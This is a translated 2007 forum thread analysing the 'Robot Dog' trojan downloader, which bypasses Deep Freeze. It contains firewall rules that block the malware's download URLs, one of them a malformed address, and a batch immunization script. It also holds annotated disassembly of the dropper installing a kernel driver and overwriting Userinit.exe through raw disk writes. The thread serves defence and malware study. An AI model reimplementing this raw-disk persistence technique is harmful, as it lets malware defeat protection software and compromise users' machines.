Topic: Origin of the Robot Dog (机器狗) virus, a compendium of defense and virus-analysis material (12944 views)
Floor 1 | 张爱玲 | Post By: 2007-9-11 10:18:31


After analysis and testing of the sample, DF 6.0, DF 6.1, DF 6.2 and all earlier versions are penetrated successfully. This is a trojan downloader. The downloader uses a driver file named PCIHDD.SYS to contend with DF for control of the hard disk, and modifies the userinit.exe file, achieving a completely hidden start at boot. Current temporary solutions: first, block the IPs; second, create an immunization file under c:\windows\system32\drivers: pcihdd.sys

Just wrote this ROS script; add it yourself if you want it. Quoted content:

# RouterOS: reject the downloader's payload fetches in the forward chain.
# The matcher keyword is missing from the posted text; content= (a string match
# on packet payload) is assumed here so that the rules parse.
/ ip firewall filter
add chain=forward content="c.8s7.net/cert.cer" action=reject comment="DF6.0"
add chain=forward content="c.tomwg.com/mm/mm.jpg" action=reject
add chain=forward content="c.tomwg.com/mm/wow.jpg" action=reject
add chain=forward content="c.tomwg.com/mm/mh011.jpg" action=reject
add chain=forward content="c.tomwg.com/mm/zt.jpg" action=reject
add chain=forward content="c.tomwg.com/mm/wl.jpg" action=reject
add chain=forward content="c.tomwg.com/mm/wd.jpg" action=reject
add chain=forward content="c.tomwg.com/mm/tl.jpg" action=reject
add chain=forward content="c.tomwg.com/mm/dh3.jpg" action=reject
# The address in the posted line reads "c.221.254.103", which is not a valid
# IPv4 literal, and the matcher keyword is again assumed (dst-address=).
# Correct the address before loading this rule.
/ ip firewall filter
add chain=forward dst-address=c.221.254.103 action=reject comment="DF6.0"

(Batch file. Note: this batch is best run only after the restore software has been installed.) Quoted content:

rem Plant an "immunization" file so the dropper cannot write its own pcihdd.sys.
echo tinking > c:\windows\system32\drivers\pcihdd.sys
rem Deny Everyone on the placeholder; "echo y|" answers cacls' confirmation prompt,
rem /c continues past access-denied errors, /d denies the named account.
echo y|cacls c:\windows\system32\drivers\pcihdd.sys /c /d everyone
rem Deny Everyone on userinit.exe, then replace its ACL (/p) with Everyone:Read only.
echo y|cacls c:\windows\system32\userinit.exe /c /d everyone
echo y|cacls c:\windows\system32\userinit.exe /c /p everyone:r

Analysis of the Deep Freeze (冰点)-penetrating virus

004016ED >/$ 6A 00          push 0                          ; /pModule = NULL
004016EF |. E8 80000000     call 00401774                   ; \GetModuleHandleA
004016F4 |. A3 F0304000     mov dword ptr [4030F0], eax
004016F9 |. E8 CBF9FFFF     call 004010C9
004016FE |. 68 00010000     push 100                        ; /DestSizeMax = 100 (256.)
00401703 |. 68 F4304000     push 004030F4                   ; |DestString = ""
00401708 |. 68 2B134000     push 0040132B                   ; |SrcString = "%SystemRoot%\System32\Userinit.exe"
0040170D |. E8 50000000     call 00401762                   ; \ExpandEnvironmentStringsA
00401712 |. 68 F4304000     push 004030F4                   ; /Arg1 = 004030F4
00401717 |. E8 32FCFFFF     call 0040134E                   ; \111.0040134E
0040171C |. 0BC0            or eax, eax
0040171E |. 75 0C           jnz short 0040172C
00401720 |. 68 E7304000     push 004030E7                   ; /String = ""B2,"?,D7,"",F7,"成?,A6,""
00401725 |. E8 68000000     call 00401792                   ; \OutputDebugStringA
0040172A |. EB 06           jmp short 00401732
0040172C |> 50              push eax                        ; /String
0040172D |. E8 60000000     call 00401792                   ; \OutputDebugStringA
00401732 |> E8 F9F8FFFF     call 00401030
00401737 |. 6A 00           push 0                          ; /ExitCode = 0
00401739 \. E8 1E000000     call 0040175C

Floor 2 | serverking | Post By: 2007-9-11 11:10:07


First reply... heh

Floor 3 | StarsunYzL | Post By: 2007-9-12 17:56:05


Ugh~~ copying some disassembly out of OD and calling that analysis??~~ Not even a comment of your own~~ Take a look at mine~~

http://www.txwm.com/BBS693167.vhtml "[Original] This is what a real debugging analysis of the Deep Freeze-penetrating virus looks like" (《[原创]这才是真正的穿冰点病毒调试分析》)

Floor 4 | yukin | Post By: 2007-9-12 17:58:29


I've seen this person's posts.

Basically all copies.

Floor 5 | icesoul | Post By: 2007-9-15 20:02:40


; --- 00401030 (listing enters mid-function): stop and delete the "PciHdd" service, then delete
; the driver file. main calls this at 00401732 after the disk write, so the driver exists only
; while the dropper is running.
00401042 E8 8D070000      call explorer.004017D4          ; jmp to ADVAPI32.OpenSCManagerA
00401047 0BC0             or eax,eax
00401049 74 5A            je short explorer.004010A5
0040104B 8985 FCFEFFFF    mov dword ptr ss:[ebp-104]>
00401051 68 FF010F00      push 0F01FF
00401056 68 29104000      push explorer.00401029          ; ASCII "PciHdd"
0040105B FFB5 FCFEFFFF    push dword ptr ss:[ebp-104>
00401061 E8 74070000      call explorer.004017DA          ; jmp to ADVAPI32.OpenServiceA
00401066 0BC0             or eax,eax
00401068 74 30            je short explorer.0040109A
0040106A 8985 F8FEFFFF    mov dword ptr ss:[ebp-108]>
00401070 8D85 DCFEFFFF    lea eax,dword ptr ss:[ebp->
00401076 50               push eax
00401077 6A 01            push 1                          ; SERVICE_CONTROL_STOP
00401079 FFB5 F8FEFFFF    push dword ptr ss:[ebp-108>
0040107F E8 3E070000      call explorer.004017C2          ; jmp to ADVAPI32.ControlService
00401084 FFB5 F8FEFFFF    push dword ptr ss:[ebp-108>
0040108A E8 3F070000      call explorer.004017CE          ; jmp to ADVAPI32.DeleteService
0040108F FFB5 F8FEFFFF    push dword ptr ss:[ebp-108>
00401095 E8 22070000      call explorer.004017BC          ; jmp to ADVAPI32.CloseServiceHandle
0040109A FFB5 FCFEFFFF    push dword ptr ss:[ebp-104>
004010A0 E8 17070000      call explorer.004017BC          ; jmp to ADVAPI32.CloseServiceHandle
004010A5 68 00010000      push 100
004010AA 8D85 00FFFFFF    lea eax,dword ptr ss:[ebp->
004010B0 50               push eax
004010B1 68 00104000      push explorer.00401000          ; ASCII "%SystemRoot%\system32\drivers\pcihdd.sys"
004010B6 E8 A7060000      call explorer.00401762          ; jmp to kernel32.ExpandEnvironmentStringsA
004010BB 8D85 00FFFFFF    lea eax,dword ptr ss:[ebp->
004010C1 50               push eax
004010C2 E8 89060000      call explorer.00401750          ; jmp to kernel32.DeleteFileA
004010C7 C9               leave
004010C8 C3               retn

; --- 004010C9: drop the driver. Resource (type 3E9, id 3E9) is written to
; %SystemRoot%\system32\drivers\pcihdd.sys, registered as service "PciHdd" with type 1
; (SERVICE_KERNEL_DRIVER) and start 3 (SERVICE_DEMAND_START), recreated if it already
; exists, and started. The file is deleted again on every exit path. Resource/file failures
; and a service that cannot be created or started end at 00401314 (MessageBoxA + ExitProcess).
004010C9 55               push ebp
004010CA 8BEC             mov ebp,esp
004010CC 81C4 C8FEFFFF    add esp,-138
004010D2 68 E9030000      push 3E9                        ; lpType = 3E9
004010D7 68 E9030000      push 3E9                        ; lpName = 3E9
004010DC FF35 F0304000    push dword ptr ds:[4030F0]      ; hModule saved by main
004010E2 E8 81060000      call explorer.00401768          ; jmp to kernel32.FindResourceA
004010E7 0BC0             or eax,eax
004010E9 74 3D            je short explorer.00401128
004010EB 8985 F4FEFFFF    mov dword ptr ss:[ebp-10C]>
004010F1 50               push eax
004010F2 FF35 F0304000    push dword ptr ds:[4030F0]
004010F8 E8 B3060000      call explorer.004017B0          ; jmp to kernel32.SizeofResource
004010FD 8985 ECFEFFFF    mov dword ptr ss:[ebp-114]>
00401103 FFB5 F4FEFFFF    push dword ptr ss:[ebp-10C>
00401109 FF35 F0304000    push dword ptr ds:[4030F0]
0040110F E8 72060000      call explorer.00401786          ; jmp to kernel32.LoadResource
00401114 0BC0             or eax,eax
00401116 74 10            je short explorer.00401128
00401118 50               push eax
00401119 E8 6E060000      call explorer.0040178C          ; jmp to kernel32.SetHandleCount (OllyDbg's label; used as LockResource: hResData in, data pointer out)
0040111E 0BC0             or eax,eax
00401120 74 06            je short explorer.00401128
00401122 8985 F0FEFFFF    mov dword ptr ss:[ebp-110]>
00401128 0BC0             or eax,eax
0040112A 75 05            jnz short explorer.0040113>
0040112C E9 E3010000      jmp explorer.00401314
00401131 68 00010000      push 100
00401136 8D85 F8FEFFFF    lea eax,dword ptr ss:[ebp->
0040113C 50               push eax
0040113D 68 00104000      push explorer.00401000          ; ASCII "%SystemRoot%\system32\drivers\pcihdd.sys"
00401142 E8 1B060000      call explorer.00401762          ; jmp to kernel32.ExpandEnvironmentStringsA
00401147 6A 00            push 0                          ; hTemplateFile
00401149 68 80000000      push 80                         ; FILE_ATTRIBUTE_NORMAL
0040114E 6A 04            push 4                          ; OPEN_ALWAYS
00401150 6A 00            push 0                          ; lpSecurityAttributes
00401152 6A 00            push 0                          ; dwShareMode = 0
00401154 68 00000040      push 40000000                   ; GENERIC_WRITE
00401159 8D85 F8FEFFFF    lea eax,dword ptr ss:[ebp->
0040115F 50               push eax
00401160 E8 E5050000      call explorer.0040174A          ; jmp to kernel32.CreateFileA
00401165 83F8 FF          cmp eax,-1
00401168 75 07            jnz short explorer.0040117>
0040116A E9 A5010000      jmp explorer.00401314           ; cannot open pcihdd.sys for write -> abort
0040116F EB 35            jmp short explorer.004011A>
00401171 8945 F8          mov dword ptr ss:[ebp-8],e>
00401174 6A 00            push 0
00401176 8D45 FC          lea eax,dword ptr ss:[ebp->
00401179 50               push eax
0040117A FFB5 ECFEFFFF    push dword ptr ss:[ebp-114>     ; resource size
00401180 FFB5 F0FEFFFF    push dword ptr ss:[ebp-110>     ; resource data
00401186 FF75 F8          push dword ptr ss:[ebp-8]
00401189 E8 28060000      call explorer.004017B6          ; jmp to kernel32.WriteFile
0040118E FF75 F8          push dword ptr ss:[ebp-8]
00401191 E8 0E060000      call explorer.004017A4          ; jmp to kernel32.SetEndOfFile
00401196 FF75 F8          push dword ptr ss:[ebp-8]
00401199 E8 D0050000      call explorer.0040176E          ; jmp to kernel32.FlushFileBuffers
0040119E FF75 F8          push dword ptr ss:[ebp-8]
004011A1 E8 9E050000      call explorer.00401744          ; jmp to kernel32.CloseHandle
004011A6 68 3F000F00      push 0F003F                     ; SC_MANAGER_ALL_ACCESS
004011AB 6A 00            push 0
004011AD 6A 00            push 0
004011AF E8 20060000      call explorer.004017D4          ; jmp to ADVAPI32.OpenSCManagerA
004011B4 0BC0             or eax,eax
004011B6 0F84 34010000    je explorer.004012F0
004011BC 8985 E8FEFFFF    mov dword ptr ss:[ebp-118]>
004011C2 6A 00            push 0                          ; lpPassword
004011C4 6A 00            push 0                          ; lpServiceStartName
004011C6 6A 00            push 0                          ; lpDependencies
004011C8 6A 00            push 0                          ; lpdwTagId
004011CA 6A 00            push 0                          ; lpLoadOrderGroup
004011CC 8D85 F8FEFFFF    lea eax,dword ptr ss:[ebp->
004011D2 50               push eax                        ; lpBinaryPathName = pcihdd.sys
004011D3 6A 00            push 0                          ; dwErrorControl
004011D5 6A 03            push 3                          ; SERVICE_DEMAND_START
004011D7 6A 01            push 1                          ; SERVICE_KERNEL_DRIVER
004011D9 6A 00            push 0                          ; dwDesiredAccess
004011DB 68 29104000      push explorer.00401029          ; ASCII "PciHdd" (display name)
004011E0 68 29104000      push explorer.00401029          ; ASCII "PciHdd" (service name)
004011E5 FFB5 E8FEFFFF    push dword ptr ss:[ebp-118>
004011EB E8 D8050000      call explorer.004017C8          ; jmp to ADVAPI32.CreateServiceA
004011F0 0BC0             or eax,eax
004011F2 74 16            je short explorer.0040120A
004011F4 8985 E4FEFFFF    mov dword ptr ss:[ebp-11C]>
004011FA FFB5 E4FEFFFF    push dword ptr ss:[ebp-11C>
00401200 E8 B7050000      call explorer.004017BC          ; jmp to ADVAPI32.CloseServiceHandle
00401205 E9 90000000      jmp explorer.0040129A
; service already exists: stop it, delete it, create it again
0040120A 68 FF010F00      push 0F01FF
0040120F 68 29104000      push explorer.00401029          ; ASCII "PciHdd"
00401214 FFB5 E8FEFFFF    push dword ptr ss:[ebp-118>
0040121A E8 BB050000      call explorer.004017DA          ; jmp to ADVAPI32.OpenServiceA
0040121F 0BC0             or eax,eax
00401221 74 30            je short explorer.00401253
00401223 8985 E4FEFFFF    mov dword ptr ss:[ebp-11C]>
00401229 8D85 C8FEFFFF    lea eax,dword ptr ss:[ebp->
0040122F 50               push eax
00401230 6A 01            push 1
00401232 FFB5 E4FEFFFF    push dword ptr ss:[ebp-11C>
00401238 E8 85050000      call explorer.004017C2          ; jmp to ADVAPI32.ControlService
0040123D FFB5 E4FEFFFF    push dword ptr ss:[ebp-11C>
00401243 E8 86050000      call explorer.004017CE          ; jmp to ADVAPI32.DeleteService
00401248 FFB5 E4FEFFFF    push dword ptr ss:[ebp-11C>
0040124E E8 69050000      call explorer.004017BC          ; jmp to ADVAPI32.CloseServiceHandle
00401253 6A 00            push 0
00401255 6A 00            push 0
00401257 6A 00            push 0
00401259 6A 00            push 0
0040125B 6A 00            push 0
0040125D 8D85 F8FEFFFF    lea eax,dword ptr ss:[ebp->
00401263 50               push eax
00401264 6A 00            push 0
00401266 6A 03            push 3
00401268 6A 01            push 1
0040126A 6A 00            push 0
0040126C 68 29104000      push explorer.00401029          ; ASCII "PciHdd"
00401271 68 29104000      push explorer.00401029          ; ASCII "PciHdd"
00401276 FFB5 E8FEFFFF    push dword ptr ss:[ebp-118>
0040127C E8 47050000      call explorer.004017C8          ; jmp to ADVAPI32.CreateServiceA
00401281 0BC0             or eax,eax
00401283 74 13            je short explorer.00401298
00401285 8985 E4FEFFFF    mov dword ptr ss:[ebp-11C]>
0040128B FFB5 E4FEFFFF    push dword ptr ss:[ebp-11C>
00401291 E8 26050000      call explorer.004017BC          ; jmp to ADVAPI32.CloseServiceHandle
00401296 EB 02            jmp short explorer.0040129>
00401298 EB 7A            jmp short explorer.0040131>
; start the driver
0040129A 6A 10            push 10                         ; SERVICE_START
0040129C 68 29104000      push explorer.00401029          ; ASCII "PciHdd"
004012A1 FFB5 E8FEFFFF    push dword ptr ss:[ebp-118>
004012A7 E8 2E050000      call explorer.004017DA          ; jmp to ADVAPI32.OpenServiceA
004012AC 0BC0             or eax,eax
004012AE 74 33            je short explorer.004012E3
004012B0 8985 E4FEFFFF    mov dword ptr ss:[ebp-11C]>
004012B6 6A 00            push 0
004012B8 6A 00            push 0
004012BA FFB5 E4FEFFFF    push dword ptr ss:[ebp-11C>
004012C0 E8 1B050000      call explorer.004017E0          ; jmp to ADVAPI32.StartServiceA
004012C5 0BC0             or eax,eax
004012C7 75 02            jnz short explorer.004012C>
004012C9 EB 49            jmp short explorer.0040131>
004012CB FFB5 E4FEFFFF    push dword ptr ss:[ebp-11C>
004012D1 E8 E6040000      call explorer.004017BC          ; jmp to ADVAPI32.CloseServiceHandle
004012D6 FFB5 E8FEFFFF    push dword ptr ss:[ebp-118>
004012DC E8 DB040000      call explorer.004017BC          ; jmp to ADVAPI32.CloseServiceHandle
004012E1 EB 0D            jmp short explorer.004012F>
004012E3 FFB5 E8FEFFFF    push dword ptr ss:[ebp-118>
004012E9 E8 CE040000      call explorer.004017BC          ; jmp to ADVAPI32.CloseServiceHandle
004012EE EB 24            jmp short explorer.0040131>
; the driver is loaded, so the file on disk is removed again
004012F0 68 00010000      push 100
004012F5 8D85 F8FEFFFF    lea eax,dword ptr ss:[ebp->
004012FB 50               push eax
004012FC 68 00104000      push explorer.00401000          ; ASCII "%SystemRoot%\system32\drivers\pcihdd.sys"
00401301 E8 5C040000      call explorer.00401762          ; jmp to kernel32.ExpandEnvironmentStringsA
00401306 8D85 F8FEFFFF    lea eax,dword ptr ss:[ebp->
0040130C 50               push eax
0040130D E8 3E040000      call explorer.00401750          ; jmp to kernel32.DeleteFileA
00401312 C9               leave
00401313 C3               retn

; --- 00401314: error exit
00401314 6A 10            push 10                         ; MB_ICONHAND
00401316 6A 00            push 0
00401318 68 00304000      push explorer.00403000          ; message text
0040131D 6A 00            push 0
0040131F E8 1A040000      call explorer.0040173E          ; jmp to USER32.MessageBoxA
00401324 6A 00            push 0
00401326 E8 31040000      call explorer.0040175C          ; jmp to kernel32.ExitProcess

; --- 0040132B..0040134D is the string "%SystemRoot%\System32\Userinit.exe" (see 00401708), which
; OllyDbg shows as code. The next function really begins at 0040134E with push ebp (55); that
; byte is swallowed by the mis-decoded imul at 00401347.
0040132B 25 53797374      and eax,74737953
00401330 65:6D            ins dword ptr es:[edi],dx
00401332 52               push edx
00401333 6F               outs dx,dword ptr es:[edi]
00401334 6F               outs dx,dword ptr es:[edi]
00401335 74 25            je short explorer.0040135C
00401337 5C               pop esp
00401338 53               push ebx
00401339 79 73            jns short explorer.004013A>
0040133B 74 65            je short explorer.004013A2
0040133D 6D               ins dword ptr es:[edi],dx
0040133E 3332             xor esi,dword ptr ds:[edx]
00401340 5C               pop esp
00401341 55               push ebp
00401342 73 65            jnb short explorer.004013A>
00401344 72 69            jb short explorer.004013AF
00401346 6E               outs dx,byte ptr es:[edi]
00401347 69742E 65 7865005>imul esi,dword ptr ds:[esi>

; --- 0040134E (argument: path of the target file; main passes Userinit.exe): locate the file's
; first cluster on the physical disk and overwrite it there, below the file system.
; Returns 0 in eax on success, otherwise a pointer to an error string (00403057, 00403066, ...).
0040134F 8BEC             mov ebp,esp
00401351 81C4 ACFAFFFF    add esp,-554
00401357 60               pushad
; open the PciHdd driver's device
00401358 6A 00            push 0
0040135A 6A 00            push 0
0040135C 6A 03            push 3                          ; OPEN_EXISTING
0040135E 6A 00            push 0
00401360 6A 00            push 0
00401362 68 00000080      push 80000000                   ; GENERIC_READ
00401367 68 2E304000      push explorer.0040302E          ; ASCII "\\.\PhysicalHardDisk0"
0040136C E8 D9030000      call explorer.0040174A          ; jmp to kernel32.CreateFileA
00401371 83F8 FF          cmp eax,-1
00401374 0F84 64030000    je explorer.004016DE
0040137A 8985 B8FAFFFF    mov dword ptr ss:[ebp-548]>     ; hPciHdd
; open the target file unbuffered and ask the file system where it lives
00401380 6A 00            push 0
00401382 68 00000020      push 20000000                   ; FILE_FLAG_NO_BUFFERING
00401387 6A 03            push 3                          ; OPEN_EXISTING
00401389 6A 00            push 0
0040138B 6A 03            push 3                          ; FILE_SHARE_READ|FILE_SHARE_WRITE
0040138D 68 00000080      push 80000000                   ; GENERIC_READ
00401392 FF75 08          push dword ptr ss:[ebp+8]       ; target path
00401395 E8 B0030000      call explorer.0040174A          ; jmp to kernel32.CreateFileA
0040139A 83F8 FF          cmp eax,-1
0040139D 0F84 27030000    je explorer.004016CA
004013A3 8945 F4          mov dword ptr ss:[ebp-C],e>     ; hFile
004013A6 33C0             xor eax,eax
004013A8 8945 EC          mov dword ptr ss:[ebp-14],>     ; StartingVcn = 0 (8 bytes)
004013AB 8945 F0          mov dword ptr ss:[ebp-10],>
004013AE 68 10010000      push 110
004013B3 8D85 D4FEFFFF    lea eax,dword ptr ss:[ebp->
004013B9 50               push eax
004013BA E8 DF030000      call explorer.0040179E          ; jmp to ntdll.RtlZeroMemory
004013BF 6A 00            push 0
004013C1 8D45 E8          lea eax,dword ptr ss:[ebp->
004013C4 50               push eax                        ; lpBytesReturned
004013C5 68 10010000      push 110                        ; nOutBufferSize
004013CA 8D85 D4FEFFFF    lea eax,dword ptr ss:[ebp->
004013D0 50               push eax                        ; RETRIEVAL_POINTERS_BUFFER
004013D1 6A 08            push 8                          ; nInBufferSize
004013D3 8D45 EC          lea eax,dword ptr ss:[ebp->
004013D6 50               push eax                        ; STARTING_VCN_INPUT_BUFFER
004013D7 68 73000900      push 90073                      ; FSCTL_GET_RETRIEVAL_POINTERS
004013DC FF75 F4          push dword ptr ss:[ebp-C]
004013DF E8 72030000      call explorer.00401756          ; jmp to kern­el32.DeviceIoControl
004013E4 0BC0             or eax,eax
004013E6 0F84 C7020000    je explorer.004016B3
004013EC 8DBD D4FEFFFF    lea edi,dword ptr ss:[ebp->
004013F2 8B1F             mov ebx,dword ptr ds:[edi]      ; ExtentCount
004013F4 8D7F 10          lea edi,dword ptr ds:[edi+>     ; Extents[0]
004013F7 8B45 E8          mov eax,dword ptr ss:[ebp->
004013FA 0BDB             or ebx,ebx
004013FC 0F84 B8020000    je explorer.004016BA
00401402 8B47 08          mov eax,dword ptr ds:[edi+>     ; Lcn low dword
00401405 8B57 0C          mov edx,dword ptr ds:[edi+>     ; Lcn high dword
00401408 83F8 FF          cmp eax,-1                      ; -1 = no physical cluster
0040140B 0F84 99020000    je explorer.004016AA
00401411 83FA FF          cmp edx,-1
00401414 0F84 90020000    je explorer.004016AA
0040141A 8985 C4FAFFFF    mov dword ptr ss:[ebp-53C]>
00401420 8995 C8FAFFFF    mov dword ptr ss:[ebp-538]>
; read the file's first 0x200 bytes through the file system, for the comparison below
00401426 6A 00            push 0
00401428 8D45 E8          lea eax,dword ptr ss:[ebp->
0040142B 50               push eax
0040142C 68 00020000      push 200
00401431 8D85 D4FCFFFF    lea eax,dword ptr ss:[ebp->
00401437 50               push eax
00401438 FF75 F4          push dword ptr ss:[ebp-C]
0040143B E8 58030000      call explorer.00401798          ; jmp to kernel32.ReadFile
00401440 FF75 F4          push dword ptr ss:[ebp-C]
00401443 E8 FC020000      call explorer.00401744          ; jmp to kernel32.CloseHandle
00401448 C745 F4 00000000 mov dword ptr ss:[ebp-C],0
; open the raw disk read/write and parse the MBR
0040144F 6A 00            push 0
00401451 6A 00            push 0
00401453 6A 03            push 3                          ; OPEN_EXISTING
00401455 6A 00            push 0
00401457 6A 03            push 3
00401459 68 000000C0      push C0000000                   ; GENERIC_READ|GENERIC_WRITE
0040145E 68 44304000      push explorer.00403044          ; ASCII "\\.\PhysicalDrive0"
00401463 E8 E2020000      call explorer.0040174A          ; jmp to kernel32.CreateFileA
00401468 83F8 FF          cmp eax,-1
0040146B 0F84 40020000    je explorer.004016B1
00401471 8985 D0FAFFFF    mov dword ptr ss:[ebp-530]>     ; hPhysicalDrive0
00401477 6A 00            push 0
00401479 6A 00            push 0
0040147B 6A 00            push 0
0040147D FFB5 D0FAFFFF    push dword ptr ss:[ebp-530>
00401483 E8 22030000      call explorer.004017AA          ; jmp to kernel32.SetFilePointer (offset 0)
00401488 6A 00            push 0
0040148A 8D45 E8          lea eax,dword ptr ss:[ebp->
0040148D 50               push eax
0040148E 68 00020000      push 200
00401493 8D85 D4FAFFFF    lea eax,dword ptr ss:[ebp->
00401499 50               push eax
0040149A FFB5 D0FAFFFF    push dword ptr ss:[ebp-530>
004014A0 E8 F3020000      call explorer.00401798          ; jmp to kernel32.ReadFile (MBR)
004014A5 8DBD D4FAFFFF    lea edi,dword ptr ss:[ebp->
004014AB 80BF BE010000 80 cmp byte ptr ds:[edi+1BE],>     ; first partition entry must be active (80)
004014B2 0F85 DE010000    jnz explorer.00401696
004014B8 0FB69F C2010000  movzx ebx,byte ptr ds:[edi>     ; partition type
004014BF 83FB 0B          cmp ebx,0B                      ; FAT32
004014C2 74 0E            je short explorer.004014D2
004014C4 83FB 0C          cmp ebx,0C                      ; FAT32 LBA
004014C7 74 09            je short explorer.004014D2
004014C9 83FB 07          cmp ebx,7                       ; NTFS
004014CC 0F85 BB010000    jnz explorer.0040168D
004014D2 8B87 C6010000    mov eax,dword ptr ds:[edi+>     ; partition start LBA
004014D8 8985 CCFAFFFF    mov dword ptr ss:[ebp-534]>
004014DE 33D2             xor edx,edx
004014E0 69C0 00020000    imul eax,eax,200
004014E6 8955 E8          mov dword ptr ss:[ebp-18],>
004014E9 8BC8             mov ecx,eax
004014EB 6A 00            push 0
004014ED 8D45 E8          lea eax,dword ptr ss:[ebp->
004014F0 50               push eax
004014F1 51               push ecx
004014F2 FFB5 D0FAFFFF    push dword ptr ss:[ebp-530>
004014F8 E8 AD020000      call explorer.004017AA          ; jmp to kernel32.SetFilePointer (partition start)
004014FD 6A 00            push 0
004014FF 8D45 E8          lea eax,dword ptr ss:[ebp->
00401502 50               push eax
00401503 68 00020000      push 200
00401508 8D85 D4FAFFFF    lea eax,dword ptr ss:[ebp->
0040150E 50               push eax
0040150F FFB5 D0FAFFFF    push dword ptr ss:[ebp-530>
00401515 E8 7E020000      call explorer.00401798          ; jmp to kernel32.ReadFile (boot sector)
; data area = start + reserved sectors (+ FATs * sectors per FAT on FAT32); spc = byte 0D
0040151A 8DBD D4FAFFFF    lea edi,dword ptr ss:[ebp->
00401520 0FB747 0E        movzx eax,word ptr ds:[edi>     ; reserved sectors
00401524 0185 CCFAFFFF    add dword ptr ss:[ebp-534]>
0040152A 83FB 0B          cmp ebx,0B
0040152D 74 05            je short explorer.00401534
0040152F 83FB 0C          cmp ebx,0C
00401532 75 12            jnz short explorer.0040154>     ; NTFS: skip the FAT arithmetic
00401534 0FB64F 10        movzx ecx,byte ptr ds:[edi>     ; number of FATs
00401538 8B47 24          mov eax,dword ptr ds:[edi+>     ; sectors per FAT32
0040153B 33D2             xor edx,edx
0040153D 0FAFC1           imul eax,ecx
00401540 0185 CCFAFFFF    add dword ptr ss:[ebp-534]>
00401546 8B85 C4FAFFFF    mov eax,dword ptr ss:[ebp->     ; Lcn low
0040154C 8B95 C8FAFFFF    mov edx,dword ptr ss:[ebp->     ; Lcn high
00401552 0FB64F 0D        movzx ecx,byte ptr ds:[edi>     ; sectors per cluster
00401556 898D B4FAFFFF    mov dword ptr ss:[ebp-54C]>
0040155C 0FAFC1           imul eax,ecx
0040155F 0385 CCFAFFFF    add eax,dword ptr ss:[ebp->
00401565 83D2 00          adc edx,0
00401568 69C0 00020000    imul eax,eax,200                ; 32-bit: byte offset wraps past 4 GiB
0040156E 8995 C0FAFFFF    mov dword ptr ss:[ebp-540]>
00401574 8985 BCFAFFFF    mov dword ptr ss:[ebp-544]>
; read the sector at that offset and compare it with the copy read through the file system
0040157A 6A 00            push 0
0040157C 8D85 C0FAFFFF    lea eax,dword ptr ss:[ebp->
00401582 50               push eax
00401583 FFB5 BCFAFFFF    push dword ptr ss:[ebp-544>
00401589 FFB5 D0FAFFFF    push dword ptr ss:[ebp-530>
0040158F E8 16020000      call explorer.004017AA          ; jmp to kernel32.SetFilePointer
00401594 6A 00            push 0
00401596 8D45 E8          lea eax,dword ptr ss:[ebp->
00401599 50               push eax
0040159A 68 00020000      push 200
0040159F 8D85 D4FAFFFF    lea eax,dword ptr ss:[ebp->
004015A5 50               push eax
004015A6 FFB5 D0FAFFFF    push dword ptr ss:[ebp-530>
004015AC E8 E7010000      call explorer.00401798          ; jmp to kernel32.ReadFile
004015B1 8DBD D4FAFFFF    lea edi,dword ptr ss:[ebp->
004015B7 8DB5 D4FCFFFF    lea esi,dword ptr ss:[ebp->
004015BD B9 00020000      mov ecx,200
004015C2 F3:A6            repe cmps byte ptr es:[edi>
004015C4 0BC9             or ecx,ecx
004015C6 0F85 B8000000    jnz explorer.00401684           ; mismatch -> error 00403066
; seek back, have the driver fill a one-cluster buffer, write it raw over the file's first cluster
004015CC 6A 00            push 0
004015CE 8D85 C0FAFFFF    lea eax,dword ptr ss:[ebp->
004015D4 50               push eax
004015D5 FFB5 BCFAFFFF    push dword ptr ss:[ebp-544>
004015DB FFB5 D0FAFFFF    push dword ptr ss:[ebp-530>
004015E1 E8 C4010000      call explorer.004017AA          ; jmp to kernel32.SetFilePointer
004015E6 8B85 B4FAFFFF    mov eax,dword ptr ss:[ebp->
004015EC C1E0 09          shl eax,9                       ; spc * 200 = one cluster in bytes
004015EF 8985 B4FAFFFF    mov dword ptr ss:[ebp-54C]>
004015F5 FFB5 B4FAFFFF    push dword ptr ss:[ebp-54C>
004015FB 6A 40            push 40                         ; GPTR
004015FD E8 78010000      call explorer.0040177A          ; jmp to kernel32.GlobalAlloc
00401602 0BC0             or eax,eax
00401604 74 6A            je short explorer.00401670
00401606 8985 B0FAFFFF    mov dword ptr ss:[ebp-550]>
0040160C B9 3E174000      mov ecx,explorer.0040173E       ; jmp to USER32.MessageBoxA
00401611 81E9 00104000    sub ecx,explorer.00401000       ; ecx = 73E = size of this program's code 00401000..0040173E
00401617 6A 00            push 0
00401619 8D45 E8          lea eax,dword ptr ss:[ebp->
0040161C 50               push eax                        ; lpBytesReturned
0040161D FFB5 B4FAFFFF    push dword ptr ss:[ebp-54C>     ; nOutBufferSize = one cluster
00401623 FFB5 B0FAFFFF    push dword ptr ss:[ebp-550>     ; lpOutBuffer
00401629 51               push ecx                        ; nInBufferSize = 73E
0040162A 68 00104000      push explorer.00401000          ; lpInBuffer = this program's code
0040162F 68 043C00F0      push F0003C04                   ; driver-private IOCTL
00401634 FFB5 B8FAFFFF    push dword ptr ss:[ebp-548>     ; hPciHdd
0040163A E8 17010000      call explorer.00401756          ; jmp to kernel32.DeviceIoControl
0040163F 6A 00            push 0
00401641 8D45 E8          lea eax,dword ptr ss:[ebp->
00401644 50               push eax
00401645 FFB5 B4FAFFFF    push dword ptr ss:[ebp-54C>     ; one cluster
0040164B FFB5 B0FAFFFF    push dword ptr ss:[ebp-550>     ; buffer filled by the driver
00401651 FFB5 D0FAFFFF    push dword ptr ss:[ebp-530>     ; hPhysicalDrive0
00401657 E8 5A010000      call explorer.004017B6          ; jmp to kernel32.WriteFile
0040165C FFB5 D0FAFFFF    push dword ptr ss:[ebp-530>
00401662 E8 07010000      call explorer.0040176E          ; jmp to kernel32.FlushFileBuffers
00401667 C745 E4 00000000 mov dword ptr ss:[ebp-1C],>     ; result = 0 (success)
0040166E EB 07            jmp short explorer.0040167>
; error paths: [ebp-1C] = pointer to a message string
00401670 C745 E4 57304000 mov dword ptr ss:[ebp-1C],>
00401677 FFB5 B0FAFFFF    push dword ptr ss:[ebp-550>
0040167D E8 FE000000      call explorer.00401780          ; jmp to kernel32.GlobalFree
00401682 EB 19            jmp short explorer.0040169>
00401684 C745 E4 66304000 mov dword ptr ss:[ebp-1C],>
0040168B EB 10            jmp short explorer.0040169>
0040168D C745 E4 75304000 mov dword ptr ss:[ebp-1C],>
00401694 EB 07            jmp short explorer.0040169>
00401696 C745 E4 86304000 mov dword ptr ss:[ebp-1C],>
0040169D FFB5 D0FAFFFF    push dword ptr ss:[ebp-530>
